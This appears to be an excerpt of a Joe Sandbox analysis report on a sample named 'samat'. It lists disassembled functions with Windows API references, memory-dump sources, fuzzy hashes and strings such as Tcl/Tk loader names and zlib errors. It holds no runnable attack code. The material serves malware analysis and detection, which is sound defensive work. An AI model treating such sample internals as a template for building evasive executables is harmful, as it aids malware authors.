CloseHandle.KERNELBASE(?,?,?,00007FF7E12DA9D5,?,?,00000000,00007FF7E12DAA8A), ref: 00007FF7E12DABC6
GetLastError.KERNEL32(?,?,?,00007FF7E12DA9D5,?,?,00000000,00007FF7E12DAA8A), ref: 00007FF7E12DABD0

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: f9f5ac7ec8eeb59d3cce01a8abfe12ee8a06950ccdb5c6ab72f0f5f70853a75d
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: 3221F612F0C68201FBA47751DC42779928A9F947A0F88463BD92E477C5DEFCE4814322

Function 00007FF7E12DBEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DBED4

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 881fb8897f6d56f25c0c034f21346f752949e835b6a4b3ffb2e7b9e118edaf5b
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: C1419933A1824587EB34AA15E952379B3A4FB56751F900132E68E436D1CFBEE442CB62

Function 00007FF7E12C7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7E12C803A

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 0d9b876d10d805dff503d874c4ea45c5a09dbb383c6c45e0b037d67d7559761f
Instruction ID: dd3463ab9541b6d61e452bc038bc0066947e0b485bf43a05d708a65165750640
Opcode Fuzzy Hash: 0d9b876d10d805dff503d874c4ea45c5a09dbb383c6c45e0b037d67d7559761f
Instruction Fuzzy Hash: 0521A621B1865146FB50BB22AD063BAD659BF45BC4FC98432EF0D0B786CEBDE081C312

Function 00007FF7E12DB93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DB9C2

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction ID: 979095f411f82d72718147561d2a045645e09917d5c878a80302cb4a388fb3c5
Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction Fuzzy Hash: 64315B23F1868286E7117B55CC523BCA698BB91B95FD20137E95D037D2CEFDA4418723

Function 00007FF7E12D9961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7E12D998F

Part of subcall function 00007FF7E12D9A88: GetModuleHandleExW.KERNEL32 ref: 00007FF7E12D9AAD
Part of subcall function 00007FF7E12D9A88: GetProcAddress.KERNEL32 ref: 00007FF7E12D9AC3
Part of subcall function 00007FF7E12D9A88: FreeLibrary.KERNEL32 ref: 00007FF7E12D9AEA

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: 53ddbee1291033f0ee23eb03d7878ce34820801dea9375483bd762868ae6f660
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: 08217E72B0474689EF14AF68C8813EC73A8EB04718F844637E75E07A85DFB8E545C752

Function 00007FF7E12D5F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D5EF9

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: bc2227f15ee0209f2fbec602c53c91e3ccf383f44c715bb52245c600c7a9a5c0
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 93113363B1864146EB60BF21D802379E278AF95B84F944433EA8C57A95CFFDE4004762

Function 00007FF7E12E6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E6377

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: d0648260a8084942889e47fd337e45bb410f4b071db79b1c47053612288ed481
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: F2212932B08A8187DB62AF18D842379B3A4FB84F54F948236EB6D876D5DF7CD4008B11

Function 00007FF7E12D03BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D0410

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 0946c83fcadbf284fe5f66d71f94e3fac3bae1d626e9de2e6949069bcac39978
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 3C018262B0874141EB04AF62DD0266DE6A9EF95FE0F884A32DE5C57BE6CEBCD4014316

Function 00007FF7E12D7EFC Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D7F3A

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
Instruction ID: ac454af58a42ae2c2870f655197a2197843455618fdbf10b948415cd39cb12fa
Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
Instruction Fuzzy Hash: 95018B22F1D68246FF717A219D033799298AF507D8FD442B7EA5C826C6DFFCA4404223

Function 00007FF7E12D8238 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D8251

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: 7d0e12d238922c57c5d9ce8fe34dab594bbed19bdc67f4572bfb07b010253cf0
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: E1E04652F086828BFB113AA58C8B37890684FE5340FD00432E908062C3DDBC6884A233

Function 00007FF7E12DD5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF7E12D0C90,?,?,?,00007FF7E12D22FA,?,?,?,?,?,00007FF7E12D3AE9), ref: 00007FF7E12DD63A

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: 6e2baa4037b2b19c620ba4ac7aeafc4a5e396838dfde7811840410d8a8b2229c
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 28F05E12F0C64A4AFF553771AC03375929C5F887A0F884732DD2E852C5DEBCB48081B2

Non-executed Functions

Function 00007FF7E12C76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7E12C76D7
GetLastError.KERNEL32 ref: 00007FF7E12C76E9
GetProcAddress.KERNEL32 ref: 00007FF7E12C7725
GetLastError.KERNEL32 ref: 00007FF7E12C7737
GetProcAddress.KERNEL32 ref: 00007FF7E12C7750
GetLastError.KERNEL32 ref: 00007FF7E12C7762
GetProcAddress.KERNEL32 ref: 00007FF7E12C777B
GetLastError.KERNEL32 ref: 00007FF7E12C778D
GetProcAddress.KERNEL32 ref: 00007FF7E12C77A9
GetLastError.KERNEL32 ref: 00007FF7E12C77BB
GetProcAddress.KERNEL32 ref: 00007FF7E12C77D7
GetLastError.KERNEL32 ref: 00007FF7E12C77E9
GetProcAddress.KERNEL32 ref: 00007FF7E12C7805
GetLastError.KERNEL32 ref: 00007FF7E12C7817
GetProcAddress.KERNEL32 ref: 00007FF7E12C7833
GetLastError.KERNEL32 ref: 00007FF7E12C7845
GetProcAddress.KERNEL32 ref: 00007FF7E12C7861
GetLastError.KERNEL32 ref: 00007FF7E12C7873

Strings

Tcl_GetVar2, xrefs: 00007FF7E12C7A23, 00007FF7E12C7A45
Tcl_ConditionWait, xrefs: 00007FF7E12C7999, 00007FF7E12C79BB
Tcl_NewByteArrayObj, xrefs: 00007FF7E12C7B09, 00007FF7E12C7B2B
Tcl_Free, xrefs: 00007FF7E12C7C4B, 00007FF7E12C7C6D
Tcl_DoOneEvent, xrefs: 00007FF7E12C7771, 00007FF7E12C7793
Tcl_CreateObjCommand, xrefs: 00007FF7E12C7A7F, 00007FF7E12C7AA1
Tcl_EvalFile, xrefs: 00007FF7E12C7B93, 00007FF7E12C7BB5
Tcl_FinalizeThread, xrefs: 00007FF7E12C77CD, 00007FF7E12C77EF
Tcl_GetCurrentThread, xrefs: 00007FF7E12C7857, 00007FF7E12C7879
Tcl_CreateInterp, xrefs: 00007FF7E12C771B, 00007FF7E12C773D
Tcl_Init, xrefs: 00007FF7E12C76D0, 00007FF7E12C76EF
Tcl_DeleteInterp, xrefs: 00007FF7E12C77FB, 00007FF7E12C781D
Tcl_ConditionNotify, xrefs: 00007FF7E12C796B, 00007FF7E12C798D
Failed to get address for %hs, xrefs: 00007FF7E12C76F8
Tcl_ThreadAlert, xrefs: 00007FF7E12C79F5, 00007FF7E12C7A17
Tcl_EvalObjv, xrefs: 00007FF7E12C7BEF, 00007FF7E12C7C11
Tcl_EvalEx, xrefs: 00007FF7E12C7BC1, 00007FF7E12C7BE3
Tcl_SetVar2Ex, xrefs: 00007FF7E12C7B37, 00007FF7E12C7B59
Tcl_GetString, xrefs: 00007FF7E12C7AAD, 00007FF7E12C7ACF
Tcl_ConditionFinalize, xrefs: 00007FF7E12C793D, 00007FF7E12C795F
Tcl_CreateThread, xrefs: 00007FF7E12C7829, 00007FF7E12C784B
Tk_GetNumMainWindows, xrefs: 00007FF7E12C7CA7, 00007FF7E12C7CC9
Tcl_GetObjResult, xrefs: 00007FF7E12C7B65, 00007FF7E12C7B87
Tcl_Alloc, xrefs: 00007FF7E12C7C1D, 00007FF7E12C7C3F
Tcl_Finalize, xrefs: 00007FF7E12C779F, 00007FF7E12C77C1
Tcl_NewStringObj, xrefs: 00007FF7E12C7ADB, 00007FF7E12C7AFD
Tk_Init, xrefs: 00007FF7E12C7C79, 00007FF7E12C7C9B
Tcl_FindExecutable, xrefs: 00007FF7E12C7746, 00007FF7E12C7768
Tcl_MutexLock, xrefs: 00007FF7E12C78B3, 00007FF7E12C78D5
Tcl_MutexFinalize, xrefs: 00007FF7E12C790F, 00007FF7E12C7931
GetProcAddress, xrefs: 00007FF7E12C76FF
Tcl_SetVar2, xrefs: 00007FF7E12C7A51, 00007FF7E12C7A73
Tcl_MutexUnlock, xrefs: 00007FF7E12C78E1, 00007FF7E12C7903
Tcl_ThreadQueueEvent, xrefs: 00007FF7E12C79C7, 00007FF7E12C79E9
Tcl_JoinThread, xrefs: 00007FF7E12C7885, 00007FF7E12C78A7

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: b7218dcfee3b163d06d2ccc0e6fc4f2aface9758e9a0294c1fdaf2dc1092c870
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: 8D02D520B09B0B82EF16BB55EC163B4A3A9BF14744FD09137D52E46260EFBDB149C232

Function 00007FF7E12E40AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF7E12E40FA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E4766
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E48DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E4B9A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E4DBA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E4FF7
memcpy_s.LIBCPMT ref: 00007FF7E12E50D2
memcpy_s.LIBCPMT ref: 00007FF7E12E517D
memcpy_s.LIBCPMT ref: 00007FF7E12E524C

Strings

1#QNAN, xrefs: 00007FF7E12E4213
1#SNAN, xrefs: 00007FF7E12E420A
1#IND, xrefs: 00007FF7E12E41E7
1#INF, xrefs: 00007FF7E12E4223

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction ID: f743e55af4af634fea1fd10122f670f1e80f558488bce56972e4488ddd388fa6
Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction Fuzzy Hash: A2B2E772F182C28BE7269F64D8417FDB7A9FB54348F809136DA0DD7A84DBB8A500CB51

Function 00007FF7E12CACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

too many length or distance symbols, xrefs: 00007FF7E12CAE46
invalid bit length repeat, xrefs: 00007FF7E12CB099
invalid code lengths set, xrefs: 00007FF7E12CAE2D
invalid literal/length code, xrefs: 00007FF7E12CB3E2
invalid distances set, xrefs: 00007FF7E12CB1A0
invalid literal/lengths set, xrefs: 00007FF7E12CB133
invalid distance code, xrefs: 00007FF7E12CB5B4
invalid code -- missing end-of-block, xrefs: 00007FF7E12CB0C6
invalid distance too far back, xrefs: 00007FF7E12CB670

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction ID: a040e07336edb6e667488ce7824d336e6526e31e28788d4cd26e9364b057f630
Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction Fuzzy Hash: B1521472B146A64BD7A49F14C859BBE7BADFB44340F51413AE74A83780EBBDD800CB51

Function 00007FF7E12CD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7E12CD148
RtlCaptureContext.KERNEL32 ref: 00007FF7E12CD175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7E12CD18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF7E12CD1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF7E12CD224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7E12CD241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7E12CD24C

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: da7d22fd89f193bd324d2f6b7ffb245b114b81ec7e29bfa21c2b7e0aa29bb85c
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: 5C313D72709B8586EB619F60E8813EEB364FB84704F44403BDA4E57B99DFB8D548C721

Function 00007FF7E12DA614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

